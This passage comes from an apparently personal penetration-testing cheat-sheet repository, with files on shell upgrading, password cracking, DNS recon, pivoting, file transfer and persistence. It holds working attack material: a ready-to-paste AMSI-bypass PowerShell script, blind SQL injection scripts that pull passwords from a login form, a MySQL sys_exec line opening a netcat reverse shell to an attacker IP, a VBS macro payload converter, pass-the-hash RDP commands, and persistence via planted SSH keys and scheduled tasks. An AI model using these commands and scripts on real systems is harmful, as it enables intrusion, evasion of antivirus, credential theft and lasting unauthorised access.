 4 | Step 2: do 'ctrl+z' to stop current shell and return to your own box 
 5 | Step 3: do 'stty raw -echo'
 6 | Step 4: type 'fg' to bring the stopped job (the reverse shell) back to foreground
 7 | Step 5: do 'export TERM=screen'
 8 | Step 6: you should have a nice, interactive shell now on the victim box
 9 | Step 7: to get back to normal input, either restart the terminal session or do 'stty cooked sane'
10 | 
11 | On target box, you can do this too at the end: 
12 |     reset
13 |     export SHELL=bash
14 |     export TERM=xterm-256color
15 |     stty rows <num> columns <cols>
16 |     # stty rows 35 columns 238
17 | 


--------------------------------------------------------------------------------
/scripts/convert_to_vbs.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # A script that takes a non-binary (preferably base64) file and converts it to one string in VBS
 3 | import sys
 4 | import re
 5 | 
 6 | if len(sys.argv) != 3:
 7 |     print(f'Usage: python3 {sys.argv[0]} inFile outFile')
 8 |     exit(0)
 9 | ##
10 | 
11 | global splitLines
12 | inFile = sys.argv[1]
13 | outFile = sys.argv[2]
14 | 
15 | # Read the payload file and split into an array of strings
16 | with open(inFile, "rb") as f:
17 |     for line in f:
18 |         splitLines = re.findall(".{1,170}", line.decode())
19 |     ##
20 | ##
21 | 
22 | # String variable name for vbs macro
23 | varName = "XIJsUAJU"
24 | with open(outFile, "w+") as f:
25 |     f.write(f"Dim {varName} as String\n")
26 |     f.write(f"{varName} = \"\"\n")
27 |     for line in splitLines:
28 |         f.write(f"{varName} = {varName} & \"{line}\"\n")
29 |     ##
30 | ##
31 | 


--------------------------------------------------------------------------------
/bruteforce/7zCrack.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # Script to crack password-protected 7zip files
 3 | # 7zip-JTR Decrypt Script
 4 | #
 5 | # Clone of JTR Decrypt Scripts by synacl modified for 7zip
 6 | # - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
 7 | # - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
 8 | 
 9 | echo "7zip-JTR Decrypt Script";
10 | if [ $# -ne 2 ]
11 | then
12 |   echo "Usage $0 <7z file> <wordlist>";
13 |   exit;
14 | fi
15 | 7z l $1
16 | 
17 | echo "Generating wordlist..."
18 | john --wordlist="$2" --rules --stdout | while read i
19 | do
20 |   echo -ne "\rTrying \"$i\" " 
21 |   7z x -p$i $1 -aoa >/dev/null
22 |   STATUS=$?
23 |   if [ $STATUS -eq 0 ]; then
24 |     echo -e "\rArchive password is: \"$i\"" 
25 |     break
26 |   fi
27 | done
28 | 


--------------------------------------------------------------------------------
/recon/dns.txt:
--------------------------------------------------------------------------------
 1 | dig:
 2 |     DNS lookup:
 3 |         syntax : dig <domain>
 4 |         example: dig hacker.com
 5 | 
 6 |     Zone transfers:
 7 |         syntax : dig axfr @<targetIP> <domain>
 8 |         example: dig axfr @10.12.15.64 website.com
 9 | 
10 | host:
11 | 	syntax : host -t ns <domain>	#mx for mail service
12 | 	example: host -t ns cisco.com
13 | 
14 | 	Zone transfers:
15 | 	syntax : host -l <domain> <subdomain>
16 | 	example: host -l cisco.com ns2.cisco.com
17 | 	
18 | dnsrecon:
19 | 	syntax : dnsrecon -d <targetIP> -r <targetIp>/<range>
20 | 	exmaple: dnsrecon -d 10.10.10.100 -r 10.10.10.100/8
21 | 	example: dnsrecon -d cisco.com -t axfr
22 | 
23 | dnsenum:
24 | 	syntax : dnsenum <zonetransferDomain>
25 | 	example: dnsenum ns2.cisco.com
26 | 
27 | dnscan:
28 |     syntax : dnscan.py -d <domain> -w <subdomainWordlist>
29 |     example: dnscan.py -d ecorp.io -w subdomains-100.txt
30 | 


--------------------------------------------------------------------------------
/filetransfer/base64.txt:
--------------------------------------------------------------------------------
 1 | Transfer files via base64:
 2 | 
 3 | 	Linux:
 4 | 		Step 1(victim): cat <file> | base64 -w 0 | xclip     ### xclip copies the output to your clipboard, so you can paste the base64. It's not always available, though.
 5 | 		Step 2(host)  : echo <b64String> | base64 -d > file
 6 |   
 7 |   
 8 | 	Windows (some are powershell-only):
 9 | 		Step 1(victim): $fc = Get-Content <file>
10 |     	Step 2(victim): $fe = [System.Text.Encoding]::UTF8.GetBytes($fc)	# [System.Text.Encoding]::Unicode.GetBytes(<file>)
11 |  		Step 3(victim): [System.Convert]::ToBase64String($fe)
12 | 
13 | 
14 | 		Step 1(target):	certutil -encode <file> <tmpOutput> && findstr /v /c:- <tmpOutput> > <endFile>
15 | 		Optional step 1(target): certutil -decode <endFile> <plaintextFile>
16 |   
17 | 		Example:
18 | 		certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64
19 | 		certutil -decode data.b64 data.txt
20 | 


--------------------------------------------------------------------------------
/filetransfer/rsync.txt:
--------------------------------------------------------------------------------
 1 | Transfer files from and to an rsync server: 
 2 | https://www.tecmint.com/rsync-local-remote-file-synchronization-commands/
 3 | 
 4 | 	flags: -v = verbose	-r = copy data recursively	-a = copy data recursively and preserve symbolic links, file permissions, user & group ownerships...
 5 | 	       -z = compress file data	-h = human-readable format
 6 | 
 7 | 	
 8 | 	Transfer files on a local machine:
 9 | 
10 | 		syntax : rsync <source> <destination>
11 | 		example: rsync ./passwords.tar /tmp/passwords/
12 | 	
13 | 	Transfer files from a local machine  to a remote rsync server:
14 | 
15 | 		syntax : rsync <source> <user>@<targetIP>:<dest>
16 | 		example: rsync ./passwords/ randy@10.10.23.11:/home/randy/
17 | 
18 | 	Transfer files from a remote rsync server to a local machine:
19 | 
20 | 		syntax : rsync <user>@<targetIP>:<source> <dest>
21 | 		example: rsync randy@10.10.23.11/home/randy/passwords /tmp/passwords
22 | 


--------------------------------------------------------------------------------
/forensics/luks_encrypted.txt:
--------------------------------------------------------------------------------
 1 | Mount LUKS encrypted file (https://askubuntu.com/questions/835525/how-to-mount-luks-encrypted-file/835532#835532):
 2 | 
 3 | 	Step 1: modprobe dm-crypt 	# Make sure 'dm-crypt' kernel module is loaded
 4 | 	Step 2: cryptsetup open --type luks /path/to/<file> <name>
 5 | 	Step 3: mount /dev/mapper/<name> /mnt
 6 | 
 7 | 	Bruteforce LUKS password (https://articles.forensicfocus.com/2018/02/22/bruteforcing-linux-full-disk-encryption-luks-with-hashcat/):
 8 | 
 9 | 		Step 1: dd if=<imageFile> of=<outFile>.dd bs=512 count=4079
10 | 		Step 2: hashcat -m 14600 -a 0 -w 3 <imageFile> <dictionary> --force
11 | 	
12 | 
13 | 	Dump LUKS file info:
14 | 
15 | 		example: cryptsetup luksDump <file>
16 | 
17 | 
18 | Extract hashes from LUKS file from ram memory(https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811):
19 | 
20 | 	Step 1: get LiME (https://github.com/504ensicsLabs/LiME)
21 | 	Step 2: 
22 | 


--------------------------------------------------------------------------------
/pivoting/windows/netsh.txt:
--------------------------------------------------------------------------------
 1 | Reverse port forward with netsh command:
 2 |     syntax : netsh interface portproxy add v4tov4 listenport=<victimPort> listenaddress=0.0.0.0 connectport=<attackerPort> connectaddress=<attackerIP>
 3 |     example: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=x.x.x.x
 4 | 
 5 |     If firewall is enabled, set inbound rule for <victimPort>:
 6 |         syntax : netsh advfirewall firewall add rule name="<name>" dir=in action=allow protocol=<protocol> localport=<victimPort>
 7 |         example: netsh advfirewall firewall add rule name="Get hacked" dir=in action=allow protocol=TCP localport=8080
 8 | 
 9 |     Now if you open an http listener on your attacker machine, you can grab files from it on the victim machine like this:
10 |         Step 1(attacker): python3 -m http.server 80
11 |         Step 2(victim)  : powershell curl http://<victimIP>:8080/exploit.txt
12 | 


--------------------------------------------------------------------------------
/pivoting/meterpreter.txt:
--------------------------------------------------------------------------------
 1 | Port forward using meterpreter:
 2 | 	syntax : portfwd add -l <attackerPort> -p <targetPort> -r <targetIP>
 3 |     example: portfwd add -l 3389 -p 3389 -r 10.20.15.37
 4 | 	example: portfwd add -l 445 -p 445 -r 127.0.0.1     # for when you want to forward the port of the machine you're currently on
 5 | 
 6 | Create SOCKS proxy (useful if you want to nmap a box on the internal network
 7 |  that you can't access from the outside):
 8 | 	Step 1(attacker): vi /etc/proxychains.conf	-> add 'socks4/5 127.0.0.1 <socksPort>'
 9 | 	Step 2(attacker): run autoroute -s <subnet>     -> -p to list all active routes
10 | 	Example		    : run autoroute -s 172.16.156.0/24
11 | 	Step 3(attacker): Background Meterpreter session -> use auxiliary/server/socks_proxy
12 | 	Step 4(attacker): set SRVPORT <socksPort>
13 | 	Step 5(attacker): run
14 | 	Step 6(attacker): proxychains nmap -sT -Pn <targetIP>
15 | 	Example		    : proxychains nmap -sT -Pn 172.16.156.200
16 | 


--------------------------------------------------------------------------------
/databases/sql/mysql.txt:
--------------------------------------------------------------------------------
 1 | Connect to mysql instance:
 2 | 
 3 | 	syntax : mysql -u <user> -p
 4 | 	example: mysql -u borat -p
 5 | 	example: mysql -h 10.12.45.43 -u borat -p
 6 | 
 7 | 
 8 | List all tables of all databases (in mysql CLI):
 9 | 
10 | 	example: select TABLE_NAME from information_schema.tables;
11 | 
12 | 
13 | List all databases (in mysql CLI):
14 | 
15 | 	example: show databases;
16 | 
17 | 
18 | Execute system commands:
19 | 
20 | 	Step 1: Check if you can actually run system commands on mysql
21 | 		command: locate udf
22 | 			 # Check if /usr/lib/lib_mysqludf_sys.so is present
23 | 	
24 | 		command: select * from mysql.func;
25 | 			 # Check if sys_exec and udf are enabled
26 | 
27 | 	Step 2: Execute system commands
28 | 		
29 | 		syntax : select sys_exec('<shellCmd>');
30 | 		example: select sys_exec('usermod -a -G sudo john');
31 | 		example: select sys_exec('usermod -u 0 john');
32 | 		example: select sys_exec('nc -e /bin/sh 192.168.0.123 443');
33 | 


--------------------------------------------------------------------------------
/azure_ad/azurehound.txt:
--------------------------------------------------------------------------------
 1 | Azurehound is Bloodhound's Azure and Azure AD attack path mapper.
 2 | 
 3 | Use Azurehound to map out the Azure infrastructure:
 4 |     Step 1: Azurehound uses both Azure AD as well as Az Powershell, so we need to connect both
 5 |         syntax : $passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("<username>@<domain>", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Credential $creds
 6 |         example: $passwd = ConvertTo-SecureString "S3cureP@ss!" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("hr@ecorp.com", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Cred
 7 |         ential $creds
 8 | 
 9 |     Step 2: Import Azurehound and let the dog loose
10 |         example: Import-Module C:\Tools\Azurehound\Azurehound.ps1
11 |                  Invoke-AzureHound -verbose
12 |     Step 3: Open Bloodhound and drop the resulting zip folder in there
13 | 


--------------------------------------------------------------------------------
/metasploit/metasploit.txt:
--------------------------------------------------------------------------------
 1 | Start up metasploit:
 2 | 
 3 | 	Step 1: sudo service postgresql start
 4 | 	Step 2: (sudo msfdb init)
 5 | 	Step 3: msfconsole
 6 | 
 7 | 
 8 | General commands:
 9 | 	Search stuff 		      : search <stuff>
10 | 	Search auxiliary modules      : show auxiliary
11 | 	Show info about module	      : info, show options	# set RHOSTS 10.10.14.86
12 | 	Set global variables	      : setg <option>		# setg LHOST 192.168.0.144
13 | 
14 | 	auto-migrate to stable process: set AutoRunScript post/windows/manage/migrate
15 | 					# When running a client-side attack, the victim will most likely close the malicious file within seconds,
16 | 					  causing your shell to crash. By using auto-migrate, the shell will migrate to a stable process on the machine
17 | 					  so the shell won't die when its bearer dies.
18 | 
19 | Use the metasploit database:
20 | 
21 | 	Check all the scanned hosts	   : hosts
22 | 	Run an nmap on all the hosts	   : db_nmap 10.12.12.1-255
23 | 	Check found open ports on the hosts: services -p 22
24 | 


--------------------------------------------------------------------------------
/databases/sql/blindSqli.txt:
--------------------------------------------------------------------------------
 1 | Blind SQL Injection attack steps, tested on mysql(start from -> http://vulnsite.com/clients.php?id=150):
 2 | 
 3 | 	# Important note! For Sql injection comments (--) to work, you need to include a space at the end (-- ) or (-- -)	
 4 | 
 5 | 	Step 1: id=150'	-> error is not visible, so try blind injection
 6 | 	Step 2: id=150 and 1=1-- -> same output? Try (id=150 and 1=2--) -> if this gives no output anymore, you have a sql injection
 7 | 	Step 3: id=150 or sleep(5) -> page takes longer than 5 seconds to load, then you have a sql injection
 8 | 	
 9 | 	Step 4: enumeration phase -> We use 'if' statements with 'sleep' to see what data exists and what doesn't (there are scripts for this)
10 | 	# Say that we know '@@version' returns 'mysql 3.5.0', then we can do a test to see if our enumeration query works
11 | 	# So we can do 'select if(mid(@@version,1,1) = 'm', sleep(5), 0)', this sleeps for 5 seconds if the first character returned is 'm'
12 | 	# If this query takes 5+ seconds to run, it means it's true
13 | 


--------------------------------------------------------------------------------
/defense_evasion/amsi/AmsiInitFailed.ps1:
--------------------------------------------------------------------------------
 1 | # Powershell script to set AmsiInitFailed to true to disable AMSI
 2 | # DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED
 3 | 
 4 | $niks = $null
 5 | $waar = $true
 6 | 
 7 | # loop through all assembly types to get the AmsiUtils class
 8 | $a=[Ref].Assembly.GetTypes()
 9 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}
10 | 
11 | # loop through all non-public, static attributes in the AmsiUtils class and grab the AmsiInitFailed field
12 | $d=$c.GetFields('NonPublic,Static')
13 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}}
14 | 
15 | # set the AmsiInitFailed field to true
16 | $f.SetValue($niks, $waar)
17 | 
18 | 
19 | ### COPY-PASTE HERE
20 | 
21 | $niks = $null
22 | $waar = $true
23 | 
24 | $a=[Ref].Assembly.GetTypes()
25 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}
26 | 
27 | $d=$c.GetFields('NonPublic,Static')
28 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}}
29 | 
30 | $f.SetValue($niks, $waar)
31 | 


--------------------------------------------------------------------------------
/scripts/blind_sqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # Based on Ippsec's video of hackthebox 'Falafel' (https://www.youtube.com/watch?v=CUbWpteTfio)
 3 | import requests
 4 | import string
 5 | 
 6 | postUrl = 'http://10.10.10.73/login.php'
 7 | chars = string.ascii_letters+string.digits+string.punctuation
 8 | 
 9 | # This is the message we want to see for a successful injection
10 | errorMsg = 'Wrong identification'
11 | 
12 | # Perform the blind sql injection
13 | def doSqli(index, character):
14 |     return f"admin' and substr(password,{index},1) = '{character}'-- -"
15 | ###
16 | 
17 | for i in range(1,150):
18 |     for c in chars:
19 |         sqli = doSqli(i, c)
20 | 
21 |         # The post parameters
22 |         payload = {'username':sqli, 'password':'admin'}
23 | 
24 |         # The actual POST request
25 |         r = requests.post(postUrl, data = payload)
26 |         
27 |         if errorMsg in r.text:
28 |             print(c, end='', flush=True)
29 |             break
30 |         ###
31 | 
32 |     ###
33 | ###
34 | print()
35 | 


--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/ghidra.txt:
--------------------------------------------------------------------------------
 1 | Ghidra is an open-source reverse engineering tool released by the NSA.
 2 | 
 3 | To get started on debugging a binary:
 4 | 
 5 | 	Step 1: File -> New Project -> Choose directory and project name
 6 | 	Step 2: File -> Import File -> Select the binary to disassemble
 7 | 	Step 3: Doubleclick the file to start debugging
 8 | 
 9 | Rewrite (patch) instructions:
10 | 	# There is a bug in Ghidra, which causes a rewritten program to segfault when exported. Fix this by importing the binary
11 | 	  in raw format.
12 | 
13 | 	Step 1: Find the desired function to rewrite
14 | 	Step 2: Right click the function (assembly code in middle screen) -> Patch instruction
15 | 	Step 3: Rewrite the instruction (for example: change JNZ LAB_000011f4 to JNZ LAB_000023df)
16 | 	Step 4: File -> Export Program
17 | 	Step 5: Choose format and output directory/name
18 | 	Step 6: Run the new program
19 | 
20 | Navigate to address:
21 | 
22 | 	Step 1: Navigation -> Go to
23 | 	Step 2: enter address, label or expression
24 | 


--------------------------------------------------------------------------------
/mail/smtp/smtp.txt:
--------------------------------------------------------------------------------
 1 | Set up a simple smtp server with Python (https://muffinresearch.co.uk/fake-smtp-server-with-python/):
 2 | 
 3 | 	syntax : python -m smtpd -n -c DebuggingServer <localHost>:<localPort> (<remoteHost>:<remotePort>)
 4 | 	example: python -m smtpd -n -c DebuggingServer localhost:25
 5 | 
 6 | 	
 7 | 	From the documentation:
 8 | 	
 9 | 	If localhost is not given, then `localhost' is used and if localport is not
10 | 	given then 8025 is used.  If remotehost is not given then `localhost' is used,
11 | 	and if remoteport is not given, then 25 is used.
12 | 
13 | 
14 | Test to see if your simple smtp server actually works (do this while above python command is running):
15 | 	
16 | 	Step 1: nc localhost 25
17 | 
18 | 	HELO host
19 | 	MAIL FROM: me@localhost.com
20 | 	250 Ok
21 | 	RCPT TO: test@localhost.com
22 | 	250 Ok
23 | 	DATA
24 | 	354 End data with <CR><LF>.<CR><LF>
25 | 	subject: Hello
26 | 	from: Me
27 | 	to: Test
28 | 	Python smtp server works!
29 | 	.
30 | 	250 Ok
31 | 	QUIT
32 | 	221 Bye
33 | 	Connection closed by foreign host.
34 | 


--------------------------------------------------------------------------------
/recon/gobuster.txt:
--------------------------------------------------------------------------------
 1 | Web directory enumeration:
 2 | 
 3 |     syntax : gobuster dir -u http://<victimIP> -w <wordlist> -o <outFile>
 4 |     example: gobuster dir -u http://10.12.10.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
 5 | 
 6 | Filter out response codes:
 7 | 
 8 |     syntax : gobuster dir -u http://<victimIP> -w <wordlist> -o <outFile> --wildcard -b <responseCode>
 9 |     example: gobuster dir -u http://10.12.10.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt --wildcard -b 302,404,500
10 | 
11 | 
12 | extra flags: gobuster dir -u https://<victimIP> -w <dictionary> -o <outFile> -k (ssl bypass) -x php,html,js (include these extensions)
13 | 
14 | 
15 | Recursive gobuster(https://github.com/epi052/recursive-gobuster):
16 | 
17 | 	syntax : ./recursive-gobuster.pyz -d <targetUrl> -w <wordlist> -t <threads> -x <extensions>
18 | 	example: ./recursive-gobuster.pyz -d http://website.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,js,txt
19 | 
20 | 


--------------------------------------------------------------------------------
/remote_connection/remote_desktop.txt:
--------------------------------------------------------------------------------
 1 | Connect to a Windows machine with a GUI display of the screen via rdesktop:
 2 | 
 3 | 	syntax : rdesktop <targetIP> -u <user> -p <password> -g <geometry>	# Geometry allows you to make the GUI window not fully cover your screen
 4 | 	example: rdesktop 10.12.32.43 -u administrator -p 'July2020!' -g 90%
 5 | 
 6 | Connect to a Windows machine with xfreerdp:
 7 | 
 8 | 	syntax : xfreerdp /u:<domain>\\<user> /p:'<password>' /v:<targetIP>
 9 | 	example: xfreerdp /u:ecorp.local\\twellick /p:'Secr3tP@sS' /v:10.10.123.12
10 | 
11 |     # pass-the-hash
12 |     syntax : xfreerdp /u:<domain>\\<user> /pth:<ntHash> /v:<targetIP>
13 |     example: xfreerdp /u:ecorp.local\\e.anderson /pth:4302115eb5aeb7072d5c601b8502a231 /v:10.10.123.12
14 |     example: xfreerdp /u:Server01\\administrator /pth:2231cf4984184c7223d5d76dfcb96821 /v:192.168.20.12 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /timeout:100000
15 | 
16 | Connect to a Windows machine with remmina:
17 |     example: remmina    -> configure everything
18 | 


--------------------------------------------------------------------------------
/pivoting/windows/plink.txt:
--------------------------------------------------------------------------------
 1 | Use plink(ssh client for windows) to do remote port forwarding (port 3389 is remote desktop):
 2 | 
 3 | 	Step 1(victim): upload plink.exe to the target box
 4 | 	Step 2(victim): service ssh start	
 5 | 
 6 | 	Step 3(victim): open the remote tunnel
 7 | 		
 8 | 		syntax : plink.exe -l <attackerUsername> -pw <attackerPassword> <attackerIP> -R <attackerPort>:127.0.0.1:<victimPort>
 9 | 		example: plink.exe -l root -pw hacker 192.168.0.123 -R 3388:127.0.0.1:3389
10 | 
11 | 	Optional step 4(host): rdesktop 127.0.0.1:3388
12 | 
13 | 	
14 | 	Via PuttyGen private key (through smb share to keep key off the target server):
15 | 		
16 | 		# apt-get install putty-tools
17 | 		Step 1:	
18 | 			syntax : puttygen -t <algorithm> -b <keysize> -o <outFile>.ppk	
19 | 			example: puttygen -t rsa -b 4096 -o puttykey.ppk
20 | 
21 | 		Step 2:
22 | 			syntax : plink.exe -i \\<attackerIP>\<shareName>\<key>.ppk <attacker>@<attackerIP> -R <attackerPort>:127.0.0.1:<victimPort>
23 | 			example: plink.exe -i \\192.168.0.123\kali\keyfile.ppk root@10.10.15.108 -R 5985:127.0.0.1:5985
24 | 


--------------------------------------------------------------------------------
/persistence/linux/ssh.txt:
--------------------------------------------------------------------------------
 1 | Add your public ssh key to the victim's authorized keys file:
 2 |     Step 1(attacker): Create your keys
 3 |         example: ssh-keygen
 4 | 
 5 |     Step 2(victim): Copy the public key from `/home/attacker/.ssh/id_rsa.pub` into the victim's authorized_keys file
 6 |         example: echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgFDCTvNBCBx9jBUMw7OFCDWuRq0iTehr5+i0X8T8zyJIGAYjUwxKM1dYuqKWaWcRLa11UjMxzK9V7/VgovRWseZrAGWczx6I7veYwo/tjraqKF6vV9w2dud1ghLDnunE6yKm7r5jhHDTo9c5L1/dLcLhb9NoItbQWgtGay1+ZYEt8CQ+22hRSeEUcJxGruMTY7mr3c/ykUPmyeoOEGgrOwOp4EdraRl0CxcneCTwWa6yIN26GFyRmE8ZXjoYYNb3Mi/Tp2uEBJYLjMAOZFVTUBVwonUyujyf32DjxCtwQqAtK2X3kYInAT03lW00OwmkU2k/f8FzYeRf1xWG6/TphwihZp+Eq/O1u3F7epzKTuLsZFb3XOCF4aUi9prbHRvLtvX3wQIKd4j5RJqx3wC652XmLl7izSTm7MbXi392TELZQokXCREqU9HqYoiSuyu9a9JFqS6ARECLfGLTLcqqqxjvxQzJ6A9kfG5aWzSdC8Q+wXNODGtUkduhYZhx5Whlq7M= root@kali" >> /home/victim/.ssh/authorized_keys
 7 | 
 8 |     Step 3(victim): Ensure the key files have the proper permissions set
 9 |         example: chmod 700 /home/victim/.ssh
10 |         example: chmod 600 /home/victim/.ssh/authorized_keys
11 | 


--------------------------------------------------------------------------------
/bruteforce/john.txt:
--------------------------------------------------------------------------------
 1 | John is a very popular password cracking tool
 2 | 
 3 | 
 4 | To crack a private SSH key with John:
 5 | 
 6 | 	Step 1: /opt/JohnTheRipper/run/ssh2john.py <fileToConvert> > <convertedFile>
 7 | 	Step 2: john <convertedFile> --wordlist=/usr/share/wordlists/rockyou.txt
 8 | 
 9 | 
10 | To crack a unix shadow file:
11 | 	
12 | 	Step 1: unshadow passwd.txt shadow.txt > <fileName>
13 | 	Step 2: john --wordlist=/usr/share/wordlists/rockyou.txt <fileName>
14 | 	Step 3: john --show <fileName> 
15 | 
16 | 
17 | Check for passwords to crack in zip files:
18 | 	
19 | 	Step 1: zip2john <file>.zip
20 | 	Step 2: john -w:<dictionary> <fileWithPasswordHash>
21 | 	Step 3: john <fileWithPasswordHash> --show
22 | 	Step 4: 7z x <file>.zip
23 | 
24 | 
25 | Crack a keepass database (with a key file) with john:
26 | 
27 | 	Step 1: keepass2john -k key.png secrets.kdbx > secrets.hash
28 | 	Step 2: john -w:<dictionary> <fileWithPasswordHash>
29 | 	Step 3: john <fileWithPasswordHash> --show
30 | 
31 | 
32 | To crack an encrypted SSH key with John (DES-EDE3-CBC):
33 | 	
34 | 	Step 1: sshng2john.py <fileToConvert> > <convertedFile>
35 | 	Step 2: crack file...
36 | 


--------------------------------------------------------------------------------
/databases/sql/blindSqli.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | # Based on Ippsec's video of hackthebox 'Falafel' (https://www.youtube.com/watch?v=CUbWpteTfio)
 4 | 
 5 | # for ((i=32;i<127;i++)) do printf "\\$(printf %03o "$i")"; done; printf "\n"   -> print all characters of the ascii table
 6 | 
 7 | import requests
 8 | 
 9 | postUrl = 'http://10.10.10.73/login.php'
10 | chars = '0123456789abcdefghijklmnopqrstuvwxyz'
11 | 
12 | # This is the message we want to see for a successful injection
13 | errorMsg = 'Wrong identification'
14 | 
15 | # Perform the blind sql injection
16 | def doSqli(index, character):
17 |     return f"admin' and substr(password,{index},1) = '{character}'-- -"
18 | ###
19 | 
20 | for i in range(1,150):
21 |     for c in chars:
22 |         sqli = doSqli(i, c)
23 | 
24 |         # The post parameters
25 |         payload = {'username':sqli, 'password':'admin'}
26 | 
27 |         # The actual POST request
28 |         r = requests.post(postUrl, data = payload)
29 |         
30 |         if errorMsg in r.text:
31 |             print(c, end='', flush=True)
32 |             break
33 |         ###
34 | 
35 |     ###
36 | ###
37 | print()
38 | 


--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/radare2.txt:
--------------------------------------------------------------------------------
 1 | Radare2 is a powerful command line reversing tool.
 2 | Below are the most common commands you need for reversing a binary:
 3 | 
 4 | Open binary in debug mode: r2 -d <binary>
 5 | 
 6 | Analyze binary: aaa aaaa
 7 | 
 8 | List function names: afl
 9 | 
10 | List strings in binary: izz
11 | 
12 | View disassembled functions: VV (interactive view) 
13 | 			     pdf 
14 | 			     pdf @ <function>	# pdf @ sym.main
15 | 			     V! (allows for setting of breakpoints and rewriting functions)
16 | 
17 | Rewrite an instruction (in debug mode + V!): move the target address to the top of the screen, then do 'wa <instruction>'	# works like vi, you need to do ':' first, then write 'wa <instruction>'
18 | Set a breakpoint (in debug mode + V!)      : move the target address to the top of the screen, then do 'f2'
19 | 					   : open function in pdf mode (pdf @main) and do 'db <address>'
20 | 
21 | Run program: dc
22 | Continue execution: s
23 | 
24 | Reopen in debug mode: ood
25 | 
26 | Rewrite strings in radare (must be same length to work properly): 
27 | 	
28 | 	Step 1: r2 -w <binary>
29 | 	Step 2: iz
30 | 	Step 3: w <string> @ <address>
31 | 


--------------------------------------------------------------------------------
/persistence/windows/schtasks.txt:
--------------------------------------------------------------------------------
 1 | Schedule a task that runs whenever you want (every second, minute, hour, on logon...)
 2 | This is useful if you want to create persistence through reboots on a compromised Windows host.
 3 | 
 4 | # Some good sources
 5 | https://docs.microsoft.com/en-us/windows/win32/taskschd/schtasks
 6 | https://pentestlab.blog/tag/task-scheduler/
 7 | 
 8 | 
 9 | 	Run a scheduled task every X minutes:
10 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /mo <minute> /tn <taskName>
11 | 		example: schtasks /create /tr "C:\Windows\Temp\malicious.vbs" /sc minute /mo 1 /tn "Hacker process"
12 | 
13 | 	Run a scheduled task as given user on every logon:
14 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /ru <username> /rp <password> /tn <taskName>
15 | 		example: schtasks /create /tr "cscript C:\Windows\Temp\malicious.vbs" /sc onlogon /ru Tyrell /rp "S3cureP4ss@" /tn "Compromised"
16 | 
17 | 	Run a scheduled task as system on system start:
18 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /ru <username> /tn <taskName>
19 | 		example: schtasks /create /tr "C:\Windows\Temp\malicious.exe" /sc onstart /ru System /tn "Hekked"
20 | 
21 | 


--------------------------------------------------------------------------------
/windows/reg_query.txt:
--------------------------------------------------------------------------------
 1 | All kinds of commands for browsing/manipulating Windows registry.
 2 | 
 3 | 
 4 | cmd:
 5 |     Search the registry (HKLM) for a string:
 6 |         syntax : reg query HKLM /f <string> /t REG_SZ /s
 7 |         example: reg query HKLM /f Password /t REG_SZ /s
 8 | 
 9 |     Search through HKLM:
10 |         syntax : reg query <syspath>
11 |         example: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
12 |         example: reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nginx
13 | 
14 | 
15 | powershell (https://docs.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.1):
16 |     List all subkeys of a registry key:
17 |         syntax : Get-ChildItem -Path <registry>:\
18 |         example: Get-ChildItem -Path HKCU:\ | Select-Object Name
19 | 
20 |     View a registry entry:
21 |         syntax : Get-ItemProperty -Path Registry::<registryPath>
22 |         example: Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
23 |         example: Get-ItemProperty -Path Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion -Name DevicePath
24 | 


--------------------------------------------------------------------------------
/post_exploitation/windows/schtasks.txt:
--------------------------------------------------------------------------------
 1 | Schedule a task that runs whenever you want (every second, minute, hour, on logon...)
 2 | This is useful if you want to create persistence through reboots on a compromised Windows host.
 3 | 
 4 | # Some good sources
 5 | https://docs.microsoft.com/en-us/windows/win32/taskschd/schtasks
 6 | https://pentestlab.blog/tag/task-scheduler/
 7 | 
 8 | 
 9 | 	Run a scheduled task every X minutes:
10 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /mo <minute> /tn <taskName>
11 | 		example: schtasks /create /tr "C:\Windows\Temp\malicious.vbs" /sc minute /mo 1 /tn "Hacker process"
12 | 
13 | 	Run a scheduled task as given user on every logon:
14 | 		syntax : schtasks /create /tr "<taskToRun>" /sc <schedule> /ru <username> /rp <password> /tn <taskName>
